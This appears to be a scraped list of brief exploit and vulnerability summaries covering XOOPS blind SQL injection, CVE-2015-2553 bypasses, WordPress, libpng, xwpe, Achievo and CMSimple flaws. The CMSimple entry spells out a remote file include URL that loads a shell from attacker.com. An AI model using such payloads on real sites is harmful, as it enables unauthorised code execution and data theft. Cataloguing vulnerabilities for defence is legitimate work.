This exploit takes advantage of a vulnerability in the XOOPS Module Glossarie version 1.7 (sid). It allows an attacker to perform a Blind SQL Injection attack on the target system.
The fix for CVE-2015-2553 can be bypassed to get limited mount reparse points working again for sandbox attacks. By abusing shadow object directories and creating a dummy directory that shadows GLOBAL??, an attacker can redirect a reparse point to an arbitrary location that they control.
The fix for CVE-2015-2553 can be bypassed to get limited mount reparse points working again for sandbox attacks by abusing anonymous token impersonation.
This exploit allows an attacker to perform a blind SQL injection attack on the XOOPS Module resmanager version 1.21 or below. The vulnerability exists in the edit_day.php file of the module. By manipulating the 'genreid', 'path', 'karakter', and 'adresim' parameters, an attacker can inject malicious SQL queries into the application's database and retrieve sensitive information. The exploit uses AJAX to send the SQL query and retrieve the result.
Spider Facebook plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The read_png function in libpng allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a PNG image with a large height value, which causes an integer overflow and a buffer overflow.
xwpe v1.5.30a-2.1 and prior versions are prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker could exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
When calling htmlConverter.exe with specially crafted payload it will cause buffer overflow executing arbitrary attacker supplied code.
The Achievo 1.1.0(index.php) version is vulnerable to Remote File Include. The vulnerability allows an attacker to include arbitrary remote files, resulting in remote code execution.
An attacker can bypass security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application by exploiting multiple vulnerabilities in CMSimple. The vulnerabilities exist in the file 'required_classes.php' located at 'http://www.example.com/CMSimple/plugins/filebrowser/classes/'. The attacker can use the following exploit code to execute arbitrary PHP code: http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?. The exploit also affects the following files: CMSimple/2lang/index.php, CMSimple/2site/index.php, CMSimple/cmsimple/cms.php, CMSimple/index.php, CMSimple/plugins/index.php.
Services By CQR